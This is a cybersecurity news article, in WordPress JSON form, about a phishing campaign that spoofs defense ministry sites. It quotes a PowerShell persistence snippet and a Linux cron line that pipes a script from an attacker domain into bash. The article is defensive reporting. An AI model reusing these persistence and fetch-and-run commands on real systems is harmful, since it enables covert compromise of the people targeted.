{"id":104338,"date":"2025-05-06T10:57:11","date_gmt":"2025-05-06T10:57:11","guid":{"rendered":"https:\/\/cybersecuritynews.com\/?p=104338"},"modified":"2025-08-15T05:58:23","modified_gmt":"2025-08-15T05:58:23","slug":"new-clickfix-attack-mimics-ministry-of-defense-website","status":"publish","type":"post","link":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/","title":{"rendered":"New ClickFix Attack Mimics Ministry of Defense Website to Attack Windows &amp; Linux Machines"},"content":{"rendered":"\n<p>Cybersecurity experts have identified a sophisticated new malware campaign dubbed &#8220;ClickFix&#8221; that employs advanced social engineering tactics to compromise both Windows and Linux systems.<\/p>\n\n\n\n<p>The attack creates convincing replicas of Ministry of Defense websites across multiple countries, tricking users into downloading what appears to be required security updates or official documents.<\/p>\n\n\n\n<p>Upon execution, the malware establishes persistent access while employing multiple evasion techniques to remain undetected on infected systems.<\/p>\n\n\n\n<p>Initial analysis suggests the campaign began in early April 2025, primarily targeting government contractors, defense industry employees, and military personnel through spear-phishing emails containing links to the fraudulent websites.<\/p>\n\n\n\n<p>The spoofed sites employ valid SSL certificates and domain names closely resembling legitimate government domains with minor typographical variations, such as replacing hyphens with underscores or using slight misspellings that often go unnoticed by casual visitors.<\/p>\n\n\n\n<p>Hunt.io researchers <a href=\"https:\/\/hunt.io\/blog\/apt36-clickfix-campaign-indian-ministry-of-defence\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">noted<\/a> the attack after observing unusual network traffic patterns from several defense contractor networks.<\/p>\n\n\n\n<p>&#8220;What makes<a href=\"https:\/\/cybersecuritynews.com\/clickfix-attack\/\" target=\"_blank\" rel=\"noreferrer noopener\"> ClickFix<\/a> particularly concerning is its cross-platform capabilities and the sophistication of its mimicry,&#8221; said Dr. Eliza Chen, lead threat analyst at Hunt.io.<\/p>\n\n\n\n<p>Their investigation revealed the attackers leverage country-specific design elements and exact replications of legitimate ministry portals, complete with functioning links to authentic resources, making the deception extremely convincing.<\/p>\n\n\n\n<p>The malware demonstrates remarkable versatility, deploying tailored payloads depending on the target operating system.<\/p>\n\n\n\n<p>On Windows machines, it exploits a previously undocumented vulnerability in the Windows Management Instrumentation (WMI) service, while Linux systems face exploitation through a common dependency injection technique in shared libraries.<\/p>\n\n\n\n<p>In both cases, the <a href=\"https:\/\/cybersecuritynews.com\/malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">malware<\/a> establishes persistence, creates a backdoor, and begins harvesting sensitive information from the compromised systems.<\/p>\n\n\n\n<p>Security agencies across multiple countries have issued alerts following confirmation that the campaign has successfully breached several mid-level defense contractors and at least two government agencies.<\/p>\n\n\n\n<p>Attribution remains unclear, though analysis of the command-and-control infrastructure suggests a sophisticated threat actor with significant resources.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-infection-mechanism-analysis\"><strong>Infection Mechanism Analysis<\/strong><\/h2>\n\n\n\n<p>The infection process begins when victims click on a download button for an apparent &#8220;required security certificate&#8221; or &#8220;document viewer plugin.&#8221;<\/p>\n\n\n\n<p>The downloaded file appears legitimate but contains obfuscated code that executes a multi-stage infection routine. The Windows variant utilizes a <a href=\"https:\/\/cybersecuritynews.com\/vice-society-ransomware-2\/\" target=\"_blank\" rel=\"noreferrer noopener\">PowerShell script<\/a> that creates a scheduled task for persistence:-<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$Action = New-ScheduledTaskAction -Execute \"powershell.exe\" -Argument \"-WindowStyle Hidden -EncodedCommand $encodedPayload\"\n$Trigger = New-ScheduledTaskTrigger -AtStartup\n$Settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -Hidden\nRegister-ScheduledTask -TaskName \"WindowsSecurityManager\" -Action $Action -Trigger $Trigger -Settings $Settings -RunLevel Highest<\/code><\/pre>\n\n\n\n<p>For Linux systems, the malware writes to system initialization files and creates a camouflaged service that appears related to security functions:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>echo \"#!\/bin\/bash\nnohup curl -s http:\/\/defense-update.security&#91;.]net\/payload.sh | bash &amp;\" &gt; \/etc\/cron.daily\/system-security-check\nchmod +x \/etc\/cron.daily\/system-security-check<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhs67V-Yqd9fC-IsekIPECX1EpboQm3tJwPUccXdmsdOOBE_zGxETRIm5b9OQIoSiFQ78GHK0APpSfUKlQrHp1WB2Jn4LYFQ4StHq0nWNFB7nY5baXsLFSbBemw-gTFi_39KsetGz0T1_8OO0M0ndH_pbOsZUQmgWk_9Ono2jqV4xHTyE8GkjYB3XGN9d0\/s16000\/Page%20showing%20only%20March%202025%20link%20(Source%20-%20Hunt.io).webp\" alt=\"\"\/><figcaption class=\"wp-element-caption\">Page showing only March 2025 link (Source &#8211; Hunt.io)<\/figcaption><\/figure><\/div>\n\n\n<p>The spoofed Ministry of Defense login portal showing security certificate update notification.<\/p>\n\n\n\n<p>Hunt.io researchers recommend organizations implement additional verification steps for government communications and enhance endpoint protection with behavioral analysis capabilities to detect the distinctive patterns of <a href=\"https:\/\/cybersecuritynews.com\/clickfix-captcha-technique-ransomware\/\">ClickFix<\/a> infections before data exfiltration occurs.<\/p>\n\n\n\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 91%,rgb(169,184,195) 100%)\"><strong><code><strong>Are you from the SOC and DFIR Teams? \u2013 Analyse Real time Malware Incidents with ANY.RUN -&gt;&nbsp;<a href=\"https:\/\/app.any.run\/#register?utm_source=csn_may&amp;utm_medium=post&amp;utm_campaign=trends-q1-2025&amp;utm_content=blog&amp;utm_term=010525\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Start Now for Free<\/a>.<\/strong><\/code><\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cybersecurity experts have identified a sophisticated new malware campaign dubbed &#8220;ClickFix&#8221; that employs advanced social engineering tactics to compromise both Windows and Linux systems. The attack creates convincing replicas of Ministry of Defense websites across multiple countries, tricking users into downloading what appears to be required security updates or official documents. Upon execution, the malware [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":104341,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuJdBx_6f890bdo4Dj5KSvuFolKeugSfhXZXDCuk-kO3we9qouTnhRqjSdAuOYChV7HxPdcWneH_9Qs2ItxV7jYsRNAkcbcxBWuTNjXScVdch1dBWEwbHIgBR4lL6EikNlrJnDTP1Dqukkt2WisDjtInI0uScCS_lV1hUx2Saufj7Wc0NsQTCymgXuJ3g\/s16000\/New%20ClickFix%20Attack%20Mimics%20Ministry%20of%20Defense%20Website%20to%20Attack%20Windows%20&%20Linux%20Machines.webp","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[11,48],"tags":[149,151],"class_list":{"0":"post-104338","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-cyber-security-news","8":"category-threats","9":"tag-cyber-security","10":"tag-cyber-security-news"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v25.7.1 (Yoast SEO v25.7) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>New ClickFix Attack Mimics Ministry of Defense Website to Attack Windows &amp; Linux Machines<\/title>\n<meta name=\"description\" content=\"Experts uncovered a malware campaign dubbed &quot;ClickFix&quot; using advanced social engineering to target both Windows and Linux systems.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"New ClickFix Attack Mimics Ministry of Defense Website to Attack Windows &amp; Linux Machines\" \/>\n<meta property=\"og:description\" content=\"Experts uncovered a malware campaign dubbed &quot;ClickFix&quot; using advanced social engineering to target both Windows and Linux systems.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/\" \/>\n<meta property=\"og:site_name\" content=\"Cyber Security News\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Hackingtutorialsandnews\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-06T10:57:11+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-08-15T05:58:23+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuJdBx_6f890bdo4Dj5KSvuFolKeugSfhXZXDCuk-kO3we9qouTnhRqjSdAuOYChV7HxPdcWneH_9Qs2ItxV7jYsRNAkcbcxBWuTNjXScVdch1dBWEwbHIgBR4lL6EikNlrJnDTP1Dqukkt2WisDjtInI0uScCS_lV1hUx2Saufj7Wc0NsQTCymgXuJ3g\/s16000\/New%20ClickFix%20Attack%20Mimics%20Ministry%20of%20Defense%20Website%20to%20Attack%20Windows%20&%20Linux%20Machines.webp\" \/><meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuJdBx_6f890bdo4Dj5KSvuFolKeugSfhXZXDCuk-kO3we9qouTnhRqjSdAuOYChV7HxPdcWneH_9Qs2ItxV7jYsRNAkcbcxBWuTNjXScVdch1dBWEwbHIgBR4lL6EikNlrJnDTP1Dqukkt2WisDjtInI0uScCS_lV1hUx2Saufj7Wc0NsQTCymgXuJ3g\/s16000\/New%20ClickFix%20Attack%20Mimics%20Ministry%20of%20Defense%20Website%20to%20Attack%20Windows%20&%20Linux%20Machines.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Tushar Subhra Dutta\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuJdBx_6f890bdo4Dj5KSvuFolKeugSfhXZXDCuk-kO3we9qouTnhRqjSdAuOYChV7HxPdcWneH_9Qs2ItxV7jYsRNAkcbcxBWuTNjXScVdch1dBWEwbHIgBR4lL6EikNlrJnDTP1Dqukkt2WisDjtInI0uScCS_lV1hUx2Saufj7Wc0NsQTCymgXuJ3g\/s16000\/New%20ClickFix%20Attack%20Mimics%20Ministry%20of%20Defense%20Website%20to%20Attack%20Windows%20&%20Linux%20Machines.webp\" \/>\n<meta name=\"twitter:creator\" content=\"@The_Cyber_News\" \/>\n<meta name=\"twitter:site\" content=\"@The_Cyber_News\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Tushar Subhra Dutta\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"New ClickFix Attack Mimics Ministry of Defense Website to Attack Windows & Linux Machines","description":"Experts uncovered a malware campaign dubbed \"ClickFix\" using advanced social engineering to target both Windows and Linux systems.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/","og_locale":"en_US","og_type":"article","og_title":"New ClickFix Attack Mimics Ministry of Defense Website to Attack Windows &amp; Linux Machines","og_description":"Experts uncovered a malware campaign dubbed \"ClickFix\" using advanced social engineering to target both Windows and Linux systems.","og_url":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/","og_site_name":"Cyber Security News","article_publisher":"https:\/\/www.facebook.com\/Hackingtutorialsandnews","article_published_time":"2025-05-06T10:57:11+00:00","article_modified_time":"2025-08-15T05:58:23+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuJdBx_6f890bdo4Dj5KSvuFolKeugSfhXZXDCuk-kO3we9qouTnhRqjSdAuOYChV7HxPdcWneH_9Qs2ItxV7jYsRNAkcbcxBWuTNjXScVdch1dBWEwbHIgBR4lL6EikNlrJnDTP1Dqukkt2WisDjtInI0uScCS_lV1hUx2Saufj7Wc0NsQTCymgXuJ3g\/s16000\/New%20ClickFix%20Attack%20Mimics%20Ministry%20of%20Defense%20Website%20to%20Attack%20Windows%20&%20Linux%20Machines.webp","type":"","width":"","height":""},{"width":1600,"height":900,"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuJdBx_6f890bdo4Dj5KSvuFolKeugSfhXZXDCuk-kO3we9qouTnhRqjSdAuOYChV7HxPdcWneH_9Qs2ItxV7jYsRNAkcbcxBWuTNjXScVdch1dBWEwbHIgBR4lL6EikNlrJnDTP1Dqukkt2WisDjtInI0uScCS_lV1hUx2Saufj7Wc0NsQTCymgXuJ3g\/s16000\/New%20ClickFix%20Attack%20Mimics%20Ministry%20of%20Defense%20Website%20to%20Attack%20Windows%20&%20Linux%20Machines.webp","type":"image\/jpeg"}],"author":"Tushar Subhra Dutta","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuJdBx_6f890bdo4Dj5KSvuFolKeugSfhXZXDCuk-kO3we9qouTnhRqjSdAuOYChV7HxPdcWneH_9Qs2ItxV7jYsRNAkcbcxBWuTNjXScVdch1dBWEwbHIgBR4lL6EikNlrJnDTP1Dqukkt2WisDjtInI0uScCS_lV1hUx2Saufj7Wc0NsQTCymgXuJ3g\/s16000\/New%20ClickFix%20Attack%20Mimics%20Ministry%20of%20Defense%20Website%20to%20Attack%20Windows%20&%20Linux%20Machines.webp","twitter_creator":"@The_Cyber_News","twitter_site":"@The_Cyber_News","twitter_misc":{"Written by":"Tushar Subhra Dutta","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"NewsArticle","@id":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/#article","isPartOf":{"@id":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/"},"author":{"name":"Tushar Subhra Dutta","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/person\/7eb7d8d026aa5dd566f134d4def5c05c"},"headline":"New ClickFix Attack Mimics Ministry of Defense Website to Attack Windows &amp; Linux Machines","datePublished":"2025-05-06T10:57:11+00:00","dateModified":"2025-08-15T05:58:23+00:00","mainEntityOfPage":{"@id":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/"},"wordCount":451,"publisher":{"@id":"https:\/\/cybersecuritynews.com\/#organization"},"image":{"@id":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/#primaryimage"},"thumbnailUrl":"https:\/\/i1.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuJdBx_6f890bdo4Dj5KSvuFolKeugSfhXZXDCuk-kO3we9qouTnhRqjSdAuOYChV7HxPdcWneH_9Qs2ItxV7jYsRNAkcbcxBWuTNjXScVdch1dBWEwbHIgBR4lL6EikNlrJnDTP1Dqukkt2WisDjtInI0uScCS_lV1hUx2Saufj7Wc0NsQTCymgXuJ3g\/s16000\/New%20ClickFix%20Attack%20Mimics%20Ministry%20of%20Defense%20Website%20to%20Attack%20Windows%20&%20Linux%20Machines.webp?w=1600&resize=1600,900&ssl=1","keywords":["cyber security","cyber security news"],"articleSection":["Cyber Security News","Threats"],"inLanguage":"en-US","copyrightYear":"2025","copyrightHolder":{"@id":"https:\/\/cybersecuritynews.com\/#organization"}},{"@type":"WebPage","@id":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/","url":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/","name":"New ClickFix Attack Mimics Ministry of Defense Website to Attack Windows & Linux Machines","isPartOf":{"@id":"https:\/\/cybersecuritynews.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/#primaryimage"},"image":{"@id":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/#primaryimage"},"thumbnailUrl":"https:\/\/i1.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuJdBx_6f890bdo4Dj5KSvuFolKeugSfhXZXDCuk-kO3we9qouTnhRqjSdAuOYChV7HxPdcWneH_9Qs2ItxV7jYsRNAkcbcxBWuTNjXScVdch1dBWEwbHIgBR4lL6EikNlrJnDTP1Dqukkt2WisDjtInI0uScCS_lV1hUx2Saufj7Wc0NsQTCymgXuJ3g\/s16000\/New%20ClickFix%20Attack%20Mimics%20Ministry%20of%20Defense%20Website%20to%20Attack%20Windows%20&%20Linux%20Machines.webp?w=1600&resize=1600,900&ssl=1","datePublished":"2025-05-06T10:57:11+00:00","dateModified":"2025-08-15T05:58:23+00:00","description":"Experts uncovered a malware campaign dubbed \"ClickFix\" using advanced social engineering to target both Windows and Linux systems.","breadcrumb":{"@id":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/#primaryimage","url":"https:\/\/i1.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuJdBx_6f890bdo4Dj5KSvuFolKeugSfhXZXDCuk-kO3we9qouTnhRqjSdAuOYChV7HxPdcWneH_9Qs2ItxV7jYsRNAkcbcxBWuTNjXScVdch1dBWEwbHIgBR4lL6EikNlrJnDTP1Dqukkt2WisDjtInI0uScCS_lV1hUx2Saufj7Wc0NsQTCymgXuJ3g\/s16000\/New%20ClickFix%20Attack%20Mimics%20Ministry%20of%20Defense%20Website%20to%20Attack%20Windows%20&%20Linux%20Machines.webp?w=1600&resize=1600,900&ssl=1","contentUrl":"https:\/\/i1.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuJdBx_6f890bdo4Dj5KSvuFolKeugSfhXZXDCuk-kO3we9qouTnhRqjSdAuOYChV7HxPdcWneH_9Qs2ItxV7jYsRNAkcbcxBWuTNjXScVdch1dBWEwbHIgBR4lL6EikNlrJnDTP1Dqukkt2WisDjtInI0uScCS_lV1hUx2Saufj7Wc0NsQTCymgXuJ3g\/s16000\/New%20ClickFix%20Attack%20Mimics%20Ministry%20of%20Defense%20Website%20to%20Attack%20Windows%20&%20Linux%20Machines.webp?w=1600&resize=1600,900&ssl=1","width":"1600","height":"900"},{"@type":"BreadcrumbList","@id":"https:\/\/cybersecuritynews.com\/new-clickfix-attack-mimics-ministry-of-defense-website\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/cybersecuritynews.com\/"},{"@type":"ListItem","position":2,"name":"New ClickFix Attack Mimics Ministry of Defense Website to Attack Windows &amp; Linux Machines"}]},{"@type":"WebSite","@id":"https:\/\/cybersecuritynews.com\/#website","url":"https:\/\/cybersecuritynews.com\/","name":"Cyber Security News","description":"World&#039;s #1 Premier Cybersecurity and Hacking News Portal","publisher":{"@id":"https:\/\/cybersecuritynews.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/cybersecuritynews.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/cybersecuritynews.com\/#organization","name":"Cyber Security News","url":"https:\/\/cybersecuritynews.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/logo\/image\/","url":"https:\/\/cybersecuritynews.com\/wp-content\/uploads\/2021\/06\/Cyber-security.jpg","contentUrl":"https:\/\/cybersecuritynews.com\/wp-content\/uploads\/2021\/06\/Cyber-security.jpg","width":200,"height":200,"caption":"Cyber Security News"},"image":{"@id":"https:\/\/cybersecuritynews.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Hackingtutorialsandnews","https:\/\/x.com\/The_Cyber_News","https:\/\/www.linkedin.com\/company\/cybersecurity-news\/"]},{"@type":"Person","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/person\/7eb7d8d026aa5dd566f134d4def5c05c","name":"Tushar Subhra Dutta","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f8bc0247220c7d4dea6c8b5a77d910613305ead17b13c2a7920b400435a848dd?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f8bc0247220c7d4dea6c8b5a77d910613305ead17b13c2a7920b400435a848dd?s=96&d=mm&r=g","caption":"Tushar Subhra Dutta"},"description":"Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.","url":"https:\/\/cybersecuritynews.com\/author\/tushar\/"}]}},"jetpack_featured_media_url":"https:\/\/i1.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuJdBx_6f890bdo4Dj5KSvuFolKeugSfhXZXDCuk-kO3we9qouTnhRqjSdAuOYChV7HxPdcWneH_9Qs2ItxV7jYsRNAkcbcxBWuTNjXScVdch1dBWEwbHIgBR4lL6EikNlrJnDTP1Dqukkt2WisDjtInI0uScCS_lV1hUx2Saufj7Wc0NsQTCymgXuJ3g\/s16000\/New%20ClickFix%20Attack%20Mimics%20Ministry%20of%20Defense%20Website%20to%20Attack%20Windows%20&%20Linux%20Machines.webp?w=1600&resize=1600,900&ssl=1","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts\/104338","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/comments?post=104338"}],"version-history":[{"count":4,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts\/104338\/revisions"}],"predecessor-version":[{"id":121728,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts\/104338\/revisions\/121728"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/media\/104341"}],"wp:attachment":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/media?parent=104338"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/categories?post=104338"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/tags?post=104338"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}